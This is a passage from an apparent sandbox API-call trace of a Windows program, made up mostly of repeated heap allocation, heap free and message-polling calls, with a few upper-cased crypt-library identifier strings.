hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.077] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0081.077] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0081.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0081.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ae0 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a90 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb258 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.078] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0081.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.081] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0081.081] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb288 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0081.081] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0081.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2d0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.081] PeekMessageW (in: lpMsg=0x144e02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e02c) returned 0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0081.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.081] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0081.082] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0081.082] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0081.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1c8 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0081.082] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.082] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0081.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.082] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.083] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.083] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0081.083] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0081.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0081.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb288 [0081.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.084] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.084] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.085] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0081.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0081.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: 